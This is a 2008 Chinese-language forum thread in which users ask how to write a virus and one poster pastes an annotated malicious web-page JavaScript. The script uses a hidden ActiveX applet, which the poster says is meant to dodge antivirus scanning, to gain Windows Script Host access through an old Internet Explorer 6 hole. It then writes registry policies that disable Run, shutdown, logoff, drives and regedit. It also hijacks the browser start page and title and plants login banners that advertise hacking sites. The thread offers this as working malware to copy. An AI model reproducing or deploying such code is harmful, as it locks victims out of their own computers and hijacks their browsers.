|登录 |注册

楼主: 夜风
打印 上一主题 下一主题

怎樣寫virus

[复制链接]
hui_bler
2008-3-14 05:54 PM
我老师会写...可是她不要教我..伤心死了
goodhermit95
2008-3-15 08:13 PM
VIRUS给新手学,就是reg,vbs,command这几个是简单的,怎样做?不教你,等下你去害人

回复 #9 goodday 的帖子

goodhermit95
2008-3-15 08:16 PM
要不要我帮你加到更够力?start,turn off computer,right click 全部不能
goodday
2008-3-30 06:34 AM
原帖由 goodhermit95 于 2008-3-15 08:16 PM 发表
要不要我帮你加到更够力?start,turn off computer,right click 全部不能


你有code 分享吗??

paste 你的code 看看
风中死神
2008-3-30 09:07 PM
???我完全不懂怎样写程式=。=
风中死神
2008-3-30 09:09 PM
原帖由 goodhermit95 于 2008-3-15 08:16 PM 发表
要不要我帮你加到更够力?start,turn off computer,right click 全部不能

你真得那么行吗? =。= 有点怕人。。。
goodhermit95
2008-4-1 12:00 PM
真的要?等下弄不回不管我的事
goodday
2008-4-4 11:53 AM
paste la~~~
要学
goodday
2008-4-4 12:53 PM
<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
-------------------------- 我的细解
上面那段是为了不要给anti virus scan到 page 里的 ActiveXComponent
------------------------- by goodday
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
-------------------------- 我的细解
当ActiveXComponent 的object 如果可以load 就把
WSH(Windows Script Host)拿来用 咯
------------------------- by goodday

a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
-------------------------- 我的细解
这个是
Scripting.FileSystemObject 用来写txt 或文件
------------------------- by goodday
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
-------------------------- 我的细解
这个是
Windows Scripting Host 网络object 用来找 你隔壁的 电脑 --> //goodday/mp3/
------------------------- by goodday

a1.createInstance();
Net = a1.GetObject();

try
{
if (documents .cookies.indexOf("Chg") == -1)
{

file://Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); file:
-------------------------- 我的细解
关掉你的  start--> run

------------------------- by goodday
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY"); file:
-------------------------- 我的细解
关掉你的  ??
------------------------- by goodday
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); file:
-------------------------- 我的细解
关掉你的  start--> logoff 咯
------------------------- by goodday
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "63000000", "REG_DWORD"); file:
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD"); file:
-------------------------- 我的细解
start--> run    打 regedit  开不到 的
------------------------- by goodday
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "您的计算机已经被http://www.cnhack.org/优化: )");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "您的计算机已经被http://www.cnhack.org/优化: )");
file:
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★http://com.6to23.com/ & http://www.cnhack.org/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★http://com.6to23.com/ & http://www.cnhack.org/");
file:
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>

不明的我么这边讨论啦
goodday
2008-4-4 01:15 PM
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
把code save在你的 ie的save favorite 的list 中
ie 6 没update 过的 漏洞

我有用ie 6 和 ie 7
您需要登录后才可以回帖 登录 | 注册

JBTALKS.CC |联系我们 |隐私政策 |Share

GMT+8, 2026-1-1 07:18 AM , Processed in 0.158021 second(s), 19 queries .

Powered by Discuz! X2.5 © 2001-2012 Comsenz Inc.

本论坛言论纯属发表者个人意见,与本论坛立场无关
Copyright © 2003-2012 JBTALKS.CC All Rights Reserved

Dedicated Server powered by iCore Technology Sdn. Bhd.

合作联盟网站:
JBTALKS 马来西亚中文论坛 | JBTALKS我的空间 | ICORE TECHNOLOGY SDN. BHD.
回顶部